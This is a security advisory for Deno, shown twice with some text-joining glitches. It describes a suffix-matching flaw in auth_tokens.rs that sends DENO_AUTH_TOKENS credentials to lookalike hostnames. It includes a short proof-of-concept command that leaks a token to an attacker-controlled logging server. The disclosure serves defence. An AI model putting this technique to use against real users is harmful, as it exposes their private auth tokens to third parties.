Summary
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com
may be sent to notexample.com
.
Details
auth_tokens.rs uses a simple ends_with check, which matches www.deno.land
to a deno.land
token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land
to deno.land
tokens.
PoC
- Set up a server that logs requests. RequestBin will do. For example,
denovulnpoc.example.com
.
- Run
DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain
. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
- Observe that the token intended only for the truncated domain is sent to the full domain
Impact
What kind of vulnerability is it? Who is impacted?
Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.
Summary
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for
example.com
may be sent tonotexample.com
.Details
auth_tokens.rs uses a simple ends_with check, which matches
www.deno.land
to adeno.land
token as intended, but also matchesim-in-ur-servers-attacking-ur-deno.land
todeno.land
tokens.PoC
denovulnpoc.example.com
.DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain
. For example,DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
Impact
What kind of vulnerability is it? Who is impacted?
Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.